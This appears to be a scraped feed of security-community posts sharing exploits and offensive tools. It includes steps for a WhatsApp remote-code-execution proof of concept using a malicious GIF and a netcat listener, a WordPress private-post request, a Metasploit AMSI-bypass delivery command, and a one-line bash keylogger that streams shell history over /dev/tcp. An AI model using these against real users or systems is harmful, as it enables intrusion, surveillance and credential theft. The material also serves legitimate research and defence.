[PoC] CVE-2019-11932 Whatsapp 2.19.216 Remote Code Execution
1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user
https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4
1. set the listner ip (nc -lvp 5555)
2. run ./exploit and save the content to .gif
3. exploit.gif file and send it as Document with WhatsApp to another WhatsApp user
https://t.co/dpeiJOpg4m
https://t.co/lXWWAcq8Y4
GitHub
GitHub - dorkerdevil/CVE-2019-11932: double-free bug in WhatsApp exploit poc
double-free bug in WhatsApp exploit poc. Contribute to dorkerdevil/CVE-2019-11932 development by creating an account on GitHub.
A curated list of fuzzing resources ( Books, courses - free & paid, videos, tools, tutorials & vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.
https://t.co/5zu0MtfDPT
https://t.co/5zu0MtfDPT
GitHub
secfigo/Awesome-Fuzzing
A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Develo...
Collect all URL's, sub-domains, emails, phone numbers and fuzz all parameters for XSS/SQLi/RCE/Traversal flaws with BlackWidow https://t.co/K9EOzIpaxm https://t.co/jJzZhsfoWn
GitHub
GitHub - 1N3/BlackWidow: A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target…
A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website. - GitHub - 1N3/BlackWidow: A Python based web application scanner to gather OSINT and ...
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
POC: GET /wordpress/?static=1&order=asc
Fix: Remove the static query property
https://t.co/dg5TSxIyKs
Analsyis: https://t.co/Wc5QY2Ui9s
POC: GET /wordpress/?static=1&order=asc
Fix: Remove the static query property
https://t.co/dg5TSxIyKs
Analsyis: https://t.co/Wc5QY2Ui9s
GitHub
Query: Remove the static query property. · WordPress/WordPress@f82ed75
Prevent unauthenticated views of publicly queryables content types.
Props aaroncampbell, whyisjake, nickdaugherty, xknown.
Built from https://develop.svn.wordpress.org/branches/5.2@46479
git-sv...
Props aaroncampbell, whyisjake, nickdaugherty, xknown.
Built from https://develop.svn.wordpress.org/branches/5.2@46479
git-sv...
One command to rule them all!
Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.
Testing and feedbacks are welcome!
https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB
Test it with:
msfconsole -r web.rc
Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.
Testing and feedbacks are welcome!
https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB
Test it with:
msfconsole -r web.rc
GitHub
Add support for AMSI/SBL bypass to PSH web_delivery by phra · Pull Request #12446 · rapid7/metasploit-framework
Related to rapid7/rex-powershell#17
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works
Start msfconsole
use exploit/multi/script/web_delivery
set...
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works
Start msfconsole
use exploit/multi/script/web_delivery
set...
I had fun with this one line bash keylogger today!
PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'
PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'
Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
https://t.co/C7XachfASf
https://t.co/C7XachfASf
root@Hausec
Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
In the previous two articles, I gathered local user credentials and escalated to local administrator, with my next step is getting to domain admin. Since I have local admin, I’ll be using a t…
Burp Suite Pro 2.1.05 released, with experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new approach will provide a robust basis for future capabilities. Feedback welcome if you want to play now.
https://t.co/UPYjGMibnE
https://t.co/UPYjGMibnE
releases.portswigger.net
Professional 2.1.05
This release adds experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new appr...
rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O x86/x64 binaries. https://t.co/actBdnkcxQ
GitHub
GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.
rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries. - GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.